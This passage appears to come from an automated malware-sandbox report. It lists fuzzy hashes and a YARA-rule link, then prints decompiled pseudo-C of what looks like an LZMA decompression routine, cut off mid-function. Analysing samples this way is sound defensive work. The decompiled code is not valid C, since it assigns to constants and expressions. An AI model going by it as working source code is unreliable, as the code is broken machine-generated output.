Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407234() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
